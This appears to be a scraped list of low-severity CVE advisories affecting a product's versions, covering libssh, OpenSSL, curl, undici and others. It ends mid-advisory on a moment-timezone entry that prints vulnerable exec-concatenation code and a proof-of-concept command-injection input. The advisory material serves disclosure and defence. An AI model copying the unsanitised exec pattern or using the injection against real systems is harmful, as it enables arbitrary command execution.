                CVE-2025-8277A flaw was found in libssh's handling of key exchange (KEX) processes when a client repeatedly sends incorrect KEX guesses. The library fails to free memory during these rekey operations, which can gradually exhaust system memory. This issue can lead to crashes on the client side, particularly when using libgcrypt, which impacts application stability and availability.LOW

                NVD: n/a

                RedHat: 3.1

                • 8.19.11
                • 8.19.10
                • 8.19.9
                • 8.19.8
                • 8.19.7
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-0965A flaw was found in libssh where it can attempt to open arbitrary files during configuration parsing. A local attacker can exploit this by providing a malicious configuration file or when the system is misconfigured. This vulnerability could lead to a Denial of Service (DoS) by causing the system to try and access dangerous files, such as block devices or large system files, which can disrupt normal operations.LOW

                NVD: n/a

                RedHat: 3.3

                • 8.19.11
                • 8.19.10
                • 8.19.9
                • 8.19.8
                • 8.19.7
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-0966The API function `ssh_get_hexa()` is vulnerable, when 0-lenght input is provided to this function. This function is used internally in `ssh_get_fingerprint_hash()` and `ssh_print_hexa()` (deprecated), which is vulnerable to the same input (length is provided by the calling application). The function is also used internally in the gssapi code for logging the OIDs received by the server during GSSAPI authentication. This could be triggered remotely, when the server allows GSSAPI authentication and logging verbosity is set at least to SSH_LOG_PACKET (3). This could cause self-DoS of the per-connection daemon process.LOW

                NVD: 8.2

                RedHat: 6.5

                • 8.19.11
                • 8.19.10
                • 8.19.9
                • 8.19.8
                • 8.19.7
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-5642CPython 3.9 and earlier doesn't disallow configuring an empty list ("[]") for SSLContext.set_npn_protocols() which is an invalid value for the underlying OpenSSL API. This results in a buffer over-read when NPN is used (see CVE-2024-5535 for OpenSSL). This vulnerability is of low severity due to NPN being not widely used and specifying an empty list likely being uncommon in-practice (typically a protocol name would be configured).LOW

                NVD: n/a

                RedHat: 2.7

                • 9.2.3
                • 9.2.2
                • 9.2.1
                • 9.2.0
                • 9.1.9
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-6075If the value passed to os.path.expandvars() is user-controlled a performance degradation is possible when expanding environment variables.LOW

                NVD: 5.5

                RedHat: 4

                • 9.2.3
                • 9.2.2
                • 9.2.1
                • 9.2.0
                • 9.1.9
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-48985A vulnerability in Vercel’s AI SDK has been fixed in versions 5.0.52, 5.1.0-beta.9, and 6.0.0-beta. This issue may have allowed users to bypass filetype whitelists when uploading files. All users are encouraged to upgrade. More details: https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdkLOW

                NVD: 5.3

                RedHat: n/a

                • 9.2.2
                • 9.2.1
                • 9.2.0
                • 9.1.8
                • 9.1.7
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-8114A flaw was found in libssh, a library that implements the SSH protocol. When calculating the session ID during the key exchange (KEX) process, an allocation failure in cryptographic functions may lead to a NULL pointer dereference. This issue can cause the client or server to crash.LOW

                NVD: 4.7

                RedHat: 4.7

                • 8.19.6
                • 8.19.5
                • 8.19.4
                • 8.19.3
                • 8.19.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-47279Undici is an HTTP/1.1 client for Node.js. Prior to versions 5.29.0, 6.21.2, and 7.5.0, applications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. This has been patched in versions 5.29.0, 6.21.2, and 7.5.0. As a workaound, avoid calling a webhook repeatedly if the webhook fails.LOW

                NVD: n/a

                RedHat: 3.1

                • 9.0.1
                • 9.0.0
                • 8.18.8
                • 8.18.7
                • 8.18.6
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-6297It was discovered that dpkg-deb does not properly sanitize directory permissions when extracting a control member into a temporary directory, which is documented as being a safe operation even on untrusted data. This may result in leaving temporary files behind on cleanup. Given automated and repeated execution of dpkg-deb commands on adversarial .deb packages or with well compressible files, placed inside a directory with permissions not allowing removal by a non-root user, this can end up in a DoS scenario due to causing disk quota exhaustion or disk full conditions.LOW

                NVD: n/a

                RedHat: n/a

                • 8.19.4
                • 8.19.3
                • 8.19.2
                • 8.19.1
                • 8.19.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-54798tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.LOW

                NVD: 5.3

                RedHat: 2.5

                • 9.1.2
                • 9.1.1
                • 9.1.0
                • 9.0.5
                • 9.0.4
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-29458ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.LOW

                NVD: 7.1

                RedHat: 6.1

                • 9.1.1
                • 9.1.0
                • 9.0.4
                • 9.0.3
                • 9.0.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-5889A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is a5b98a4f30d7813266b221435e1eaaf25a1b0ac5. It is recommended to upgrade the affected component.LOW

                NVD: n/a

                RedHat: 3.1

                • 9.0.2
                • 9.0.1
                • 9.0.0
                • 8.18.2
                • 8.18.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-7042A vulnerability in the GraphCypherQAChain class of langchain-ai/langchainjs versions 0.2.5 and all versions with this class allows for prompt injection, leading to SQL injection. This vulnerability permits unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database.LOW

                NVD: 9.8

                RedHat: n/a

                • 8.16.6
                • 8.16.5
                • 8.16.4
                • 8.16.3
                • 8.16.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-26458Kerberos 5 (aka krb5) 1.21.2 contains a memory leak in /krb5/src/lib/rpc/pmap_rmt.c.LOW

                NVD: n/a

                RedHat: 5.9

                • 8.17.3
                • 8.17.2
                • 8.17.1
                • 8.17.0
                • 8.16.5
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-26461Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/lib/gssapi/krb5/k5sealv3.c.LOW

                NVD: n/a

                RedHat: 5.9

                • 8.17.3
                • 8.17.2
                • 8.17.1
                • 8.17.0
                • 8.16.5
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-9143Issue summary: Use of the low-level GF(2^m) elliptic curve APIs with untrusted explicit values for the field polynomial can lead to out-of-bounds memory reads or writes. Impact summary: Out of bound memory writes can lead to an application crash or even a possibility of a remote code execution, however, in all the protocols involving Elliptic Curve Cryptography that we're aware of, either only "named curves" are supported, or, if explicit curve parameters are supported, they specify an X9.62 encoding of binary (GF(2^m)) curves that can't represent problematic input values. Thus the likelihood of existence of a vulnerable application is low. In particular, the X9.62 encoding is used for ECC keys in X.509 certificates, so problematic inputs cannot occur in the context of processing X.509 certificates. Any problematic use-cases would have to be using an "exotic" curve encoding. The affected APIs include: EC_GROUP_new_curve_GF2m(), EC_GROUP_new_from_params(), and various supporting BN_GF2m_*() functions. Applications working with "exotic" explicit binary (GF(2^m)) curve parameters, that make it possible to represent invalid field polynomials with a zero constant term, via the above or similar APIs, may terminate abruptly as a result of reading or writing outside of array bounds. Remote code execution cannot easily be ruled out. The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue.LOW

                NVD: n/a

                RedHat: 3.7

                • 8.17.2
                • 8.17.1
                • 8.17.0
                • 8.16.4
                • 8.16.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-47764cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.LOW

                NVD: n/a

                RedHat: 3.7

                • 8.17.0
                • 8.16.2
                • 8.16.1
                • 8.16.0
                • 8.15.5
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-24001jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch whose filename headers contain the line break characters `\r`, `\u2028`, or `\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its "leading garbage"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\r`, `\u2028`, or `\u2029`.LOW

                NVD: 7.5

                RedHat: 7.5

                • 8.15.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-2511Issue summary: Some non-default TLS server configurations can cause unbounded memory growth when processing TLSv1.3 sessions Impact summary: An attacker may exploit certain server configurations to trigger unbounded memory growth that would lead to a Denial of Service This problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option is being used (but not if early_data support is also configured and the default anti-replay protection is in use). In this case, under certain conditions, the session cache can get into an incorrect state and it will fail to flush properly as it fills. The session cache will continue to grow in an unbounded manner. A malicious client could deliberately create the scenario for this failure to force a Denial of Service. It may also happen by accident in normal operation. This issue only affects TLS servers supporting TLSv1.3. It does not affect TLS clients. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. OpenSSL 1.0.2 is also not affected by this issue.LOW

                NVD: n/a

                RedHat: 3.7

                • 8.14.3
                • 8.14.2
                • 8.14.1
                • 8.14.0
                • 8.13.4
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-4741Issue summary: Calling the OpenSSL API function SSL_free_buffers may cause memory to be accessed that was previously freed in some situations Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, only applications that directly call the SSL_free_buffers function are affected by this issue. Applications that do not call this function are not vulnerable. Our investigations indicate that this function is rarely used by applications. The SSL_free_buffers function is used to free the internal OpenSSL buffer used when processing an incoming record from the network. The call is only expected to succeed if the buffer is not currently in use. However, two scenarios have been identified where the buffer is freed even when still in use. The first scenario occurs where a record header has been received from the network and processed by OpenSSL, but the full record body has not yet arrived. In this case calling SSL_free_buffers will succeed even though a record has only been partially processed and the buffer is still in use. The second scenario occurs where a full record containing application data has been received and processed by OpenSSL but the application has only read part of this data. Again a call to SSL_free_buffers will succeed even though the buffer is still in use. While these scenarios could occur accidentally during normal operation a malicious attacker could attempt to engineer a stituation where this occurs. We are not aware of this issue being actively exploited. The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue.LOW

                NVD: n/a

                RedHat: 5.6

                • 8.14.3
                • 8.14.2
                • 8.14.1
                • 8.14.0
                • 8.13.4
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-5535Issue summary: Calling the OpenSSL API function SSL_select_next_proto with an empty supported client protocols buffer may cause a crash or memory contents to be sent to the peer. Impact summary: A buffer overread can have a range of potential consequences such as unexpected application beahviour or a crash. In particular this issue could result in up to 255 bytes of arbitrary private data from memory being sent to the peer leading to a loss of confidentiality. However, only applications that directly call the SSL_select_next_proto function with a 0 length list of supported client protocols are affected by this issue. This would normally never be a valid scenario and is typically not under attacker control but may occur by accident in the case of a configuration or programming error in the calling application. The OpenSSL API function SSL_select_next_proto is typically used by TLS applications that support ALPN (Application Layer Protocol Negotiation) or NPN (Next Protocol Negotiation). NPN is older, was never standardised and is deprecated in favour of ALPN. We believe that ALPN is significantly more widely deployed than NPN. The SSL_select_next_proto function accepts a list of protocols from the server and a list of protocols from the client and returns the first protocol that appears in the server list that also appears in the client list. In the case of no overlap between the two lists it returns the first item in the client list. In either case it will signal whether an overlap between the two lists was found. In the case where SSL_select_next_proto is called with a zero length client list it fails to notice this condition and returns the memory immediately following the client list pointer (and reports that there was no overlap in the lists). This function is typically called from a server side application callback for ALPN or a client side application callback for NPN. In the case of ALPN the list of protocols supplied by the client is guaranteed by libssl to never be zero in length. The list of server protocols comes from the application and should never normally be expected to be of zero length. In this case if the SSL_select_next_proto function has been called as expected (with the list supplied by the client passed in the client/client_len parameters), then the application will not be vulnerable to this issue. If the application has accidentally been configured with a zero length server list, and has accidentally passed that zero length server list in the client/client_len parameters, and has additionally failed to correctly handle a "no overlap" response (which would normally result in a handshake failure in ALPN) then it will be vulnerable to this problem. In the case of NPN, the protocol permits the client to opportunistically select a protocol when there is no overlap. OpenSSL returns the first client protocol in the no overlap case in support of this. The list of client protocols comes from the application and should never normally be expected to be of zero length. However if the SSL_select_next_proto function is accidentally called with a client_len of 0 then an invalid memory pointer will be returned instead. If the application uses this output as the opportunistic protocol then the loss of confidentiality will occur. This issue has been assessed as Low severity because applications are most likely to be vulnerable if they are using NPN instead of ALPN - but NPN is not widely used. It also requires an application configuration or programming error. Finally, this issue would not typically be under attacker control making active exploitation unlikely. The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue. Due to the low severity of this issue we are not issuing new releases of OpenSSL at this time. The fix will be included in the next releases when they become available.LOW

                NVD: n/a

                RedHat: 5.9

                • 8.14.3
                • 8.14.2
                • 8.14.1
                • 8.14.0
                • 8.13.4
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-30260Undici is an HTTP/1.1 client, written from scratch for Node.js. Undici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`. This vulnerability was patched in version(s) 5.28.4 and 6.11.1.LOW

                NVD: 4.3

                RedHat: 3.9

                • 8.13.2
                • 8.13.1
                • 8.13.0
                • 8.12.2
                • 8.12.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-30261Undici is an HTTP/1.1 client, written from scratch for Node.js. An attacker can alter the `integrity` option passed to `fetch()`, allowing `fetch()` to accept requests as valid even if they have been tampered. This vulnerability was patched in version(s) 5.28.4 and 6.11.1.LOW

                NVD: 3.5

                RedHat: 2.6

                • 8.13.2
                • 8.13.1
                • 8.13.0
                • 8.12.2
                • 8.12.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-27088es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63.LOW

                NVD: 5.5

                RedHat: n/a

                • 8.12.2
                • 8.12.1
                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-42282The ip package before 1.1.9 for Node.js might allow SSRF because some IP addresses (such as 0x7f.1) are improperly categorized as globally routable via isPublic.LOW

                NVD: 9.8

                RedHat: 9.8

                • 8.12.2
                • 8.12.1
                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-24758Undici is an HTTP/1.1 client, written from scratch for Node.js. Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authentication` headers. This issue has been patched in versions 5.28.3 and 6.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.LOW

                NVD: 4.5

                RedHat: 3.9

                • 8.12.2
                • 8.12.1
                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-5678Issue summary: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow. Impact summary: Applications that use the functions DH_generate_key() to generate an X9.42 DH key may experience long delays. Likewise, applications that use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check() to check an X9.42 DH key or X9.42 DH parameters may experience long delays. Where the key or parameters that are being checked have been obtained from an untrusted source this may lead to a Denial of Service. While DH_check() performs all the necessary checks (as of CVE-2023-3817), DH_check_pub_key() doesn't make any of these checks, and is therefore vulnerable for excessively large P and Q parameters. Likewise, while DH_generate_key() performs a check for an excessively large P, it doesn't check for an excessively large Q. An application that calls DH_generate_key() or DH_check_pub_key() and supplies a key or parameters obtained from an untrusted source could be vulnerable to a Denial of Service attack. DH_generate_key() and DH_check_pub_key() are also called by a number of other OpenSSL functions. An application calling any of those other functions may similarly be affected. The other functions affected by this are DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate(). Also vulnerable are the OpenSSL pkey command line application when using the "-pubcheck" option, as well as the OpenSSL genpkey command line application. The OpenSSL SSL/TLS implementation is not affected by this issue. The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.LOW

                NVD: 5.3

                RedHat: 5.3

                • 8.12.1
                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 8.11.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-0727Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.LOW

                NVD: 5.5

                RedHat: 5.5

                • 8.12.1
                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 8.11.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-4641A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.LOW

                NVD: 5.5

                RedHat: 4.7

                • 8.12.1
                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 8.11.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-2953A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.LOW

                NVD: 7.5

                RedHat: 7.1

                • 8.12.0
                • 8.11.4
                • 8.11.3
                • 8.11.2
                • 8.11.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-4806A flaw has been identified in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.LOW

                NVD: 5.9

                RedHat: 5.9

                • 8.11.2
                • 8.11.1
                • 8.11.0
                • 8.10.4
                • 8.10.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-4813A flaw has been identified in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.LOW

                NVD: 5.9

                RedHat: 5.9

                • 8.11.2
                • 8.11.1
                • 8.11.0
                • 8.10.4
                • 8.10.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-4016Under some circumstances, this weakness allows a user who has access to run the “ps” utility on a machine, the ability to write almost unlimited amounts of unfiltered data into the process heap.LOW

                NVD: 3.3

                RedHat: 3.3

                • 8.11.1
                • 8.11.0
                • 8.10.4
                • 8.10.3
                • 8.10.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-3446Issue summary: Checking excessively long DH keys or parameters may be very slow. Impact summary: Applications that use the functions DH_check(), DH_check_ex() or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long delays. Where the key or parameters that are being checked have been obtained from an untrusted source this may lead to a Denial of Service. The function DH_check() performs various checks on DH parameters. One of those checks confirms that the modulus ('p' parameter) is not too large. Trying to use a very large modulus is slow and OpenSSL will not normally use a modulus which is over 10,000 bits in length. However the DH_check() function checks numerous aspects of the key or parameters that have been supplied. Some of those checks use the supplied modulus value even if it has already been found to be too large. An application that calls DH_check() and supplies a key or parameters obtained from an untrusted source could be vulernable to a Denial of Service attack. The function DH_check() is itself called by a number of other OpenSSL functions. An application calling any of those other functions may similarly be affected. The other functions affected by this are DH_check_ex() and EVP_PKEY_param_check(). Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications when using the '-check' option. The OpenSSL SSL/TLS implementation is not affected by this issue. The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.LOW

                NVD: 5.3

                RedHat: 5.3

                • 8.10.4
                • 8.10.3
                • 8.10.2
                • 8.10.1
                • 8.9.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-3817Issue summary: Checking excessively long DH keys or parameters may be very slow. Impact summary: Applications that use the functions DH_check(), DH_check_ex() or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long delays. Where the key or parameters that are being checked have been obtained from an untrusted source this may lead to a Denial of Service. The function DH_check() performs various checks on DH parameters. After fixing CVE-2023-3446 it was discovered that a large q parameter value can also trigger an overly long computation during some of these checks. A correct q value, if present, cannot be larger than the modulus p parameter, thus it is unnecessary to perform these checks if q is larger than p. An application that calls DH_check() and supplies a key or parameters obtained from an untrusted source could be vulnerable to a Denial of Service attack. The function DH_check() is itself called by a number of other OpenSSL functions. An application calling any of those other functions may similarly be affected. The other functions affected by this are DH_check_ex() and EVP_PKEY_param_check(). Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications when using the "-check" option. The OpenSSL SSL/TLS implementation is not affected by this issue. The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.LOW

                NVD: 5.3

                RedHat: 5.3

                • 8.10.4
                • 8.10.3
                • 8.10.2
                • 8.10.1
                • 8.9.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-45143Undici is an HTTP/1.1 client written from scratch for Node.js. Prior to version 5.26.2, Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Cookie` headers. By design, `cookie` headers are forbidden request headers, disallowing them to be set in RequestInit.headers in browser environments. Since undici handles headers more liberally than the spec, there was a disconnect from the assumptions the spec made, and undici's implementation of fetch. As such this may lead to accidental leakage of cookie to a third-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the third party site. This was patched in version 5.26.2. There are no known workarounds.LOW

                NVD: 3.5

                RedHat: 3.9

                • 8.10.4
                • 8.10.3
                • 8.10.2
                • 8.10.1
                • 8.9.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-38546This flaw allows an attacker to insert cookies at will into a running program using libcurl, if the specific series of conditions are met. libcurl performs transfers. In its API, an application creates "easy handles" that are the individual handles for single transfers. libcurl provides a function call that duplicates en easy handle called [curl_easy_duphandle](https://curl.se/libcurl/c/curl_easy_duphandle.html). If a transfer has cookies enabled when the handle is duplicated, the cookie-enable state is also cloned - but without cloning the actual cookies. If the source handle did not read any cookies from a specific file on disk, the cloned version of the handle would instead store the file name as `none` (using the four ASCII letters, no quotes). Subsequent use of the cloned handle that does not explicitly set a source to load cookies from would then inadvertently load cookies from a file named `none` - if such a file exists and is readable in the current directory of the program using libcurl. And if using the correct file format of course.LOW

                NVD: 3.7

                RedHat: 3.7

                • 8.10.3
                • 8.10.2
                • 8.10.1
                • 8.9.2
                • 8.9.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-28321An improper certificate validation vulnerability exists in curl <v8.1.0 in the way it supports matching of wildcard patterns when listed as "Subject Alternative Name" in TLS server certificates. curl can be built to use its own name matching function for TLS rather than one provided by a TLS library. This private wildcard matching function would match IDN (International Domain Name) hosts incorrectly and could as a result accept patterns that otherwise should mismatch. IDN hostnames are converted to puny code before used for certificate checks. Puny coded names always start with `xn--` and should not be allowed to pattern match, but the wildcard check in curl could still check for `x*`, which would match even though the IDN name most likely contained nothing even resembling an `x`.LOW

                NVD: 5.9

                RedHat: 5.9

                • 8.9.0
                • 8.8.2
                • 8.8.1
                • 8.8.0
                • 8.7.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-28322An information disclosure vulnerability exists in curl <v8.1.0 when doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously wasused to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the second transfer. The problem exists in the logic for a reused handle when it is (expected to be) changed from a PUT to a POST.LOW

                NVD: 3.7

                RedHat: 3.7

                • 8.9.0
                • 8.8.2
                • 8.8.1
                • 8.8.0
                • 8.7.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-39537An issue was discovered in ncurses through v6.2-1. _nc_captoinfo in captoinfo.c has a heap-based buffer overflow.LOW

                NVD: 8.8

                RedHat: 5.5

                • 8.7.1
                • 8.7.0
                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                GHSA-56x4-j7p9-fcf9### Impact All versions of moment-timezone from 0.1.0 contain build tasks vulnerable to command injection. * if Alice uses tzdata pipeline to package moment-timezone on her own (for example via `grunt data:2014d`, where `2014d` stands for the version of the tzdata to be used from IANA's website), * and Alice let's Mallory select the version (`2014d` in our example), then Mallory can execute arbitrary commands on the machine running the grunt task, with the same privilege as the grunt task #### Am I affected? ##### Do you build custom versions of moment-timezone with grunt? If no, you're not affected. ##### Do you allow a third party to specify which particular version you want build? If yes, you're vulnerable to command injection -- third party may execute arbitrary commands on the system running grunt task with the same privileges as grunt task. ### Description #### Command Injection via grunt-zdownload.js and MITM on iana's ftp endpoint The `tasks/data-download.js` script takes in a parameter from grunt and uses it to form a command line which is then executed: ``` 6 module.exports = function (grunt) { 7 grunt.registerTask('data-download', '1. Download data from iana.org/time-zones.', function (version) { 8 version = version || 'latest'; 10 var done = this.async(), 11 src = 'ftp://ftp.iana.org/tz/tzdata-latest.tar.gz', 12 curl = path.resolve('temp/curl', version, 'data.tar.gz'), 13 dest = path.resolve('temp/download', version); ... 24 exec('curl ' + src + ' -o ' + curl + ' && cd ' + dest + ' && gzip -dc ' + curl + ' | tar -xf -', function (err) { ``` Ordinarily, one one run this script using something like `grunt data-download:2014d`, in which case version would have the value `2014d`. However, if an attacker were to provide additional content on the command line, they would be able to execute arbitrary code ``` root@e94ba0490b65:/usr/src/app/moment-timezone# grunt 'data-download:2014d ; echo flag>/tmp/foo #' \Running "data-download:2014d ; echo flag>/tmp/foo #" (data-download) task >> Downloading https://data.iana.org/time-zones/releases/tzdata2014d ; echo flag>/tmp/foo #.tar.gz >> Downloaded https://data.iana.org/time-zones/releases/tzdata2014d ; echo flag>/tmp/foo #.tar.gz Done. root@e94ba0490b65:/usr/src/app/moment-timezone# cat /tmp/foo flag ``` #### Command Injection via data-zdump.js The `tasks/data-zdump.js` script reads a list of files present in a temporary directory (created by previous tasks), and for each one, assembles and executes a command line without sanitization. As a result, an attacker able to influence the contents of that directory could gain code execution. This attack 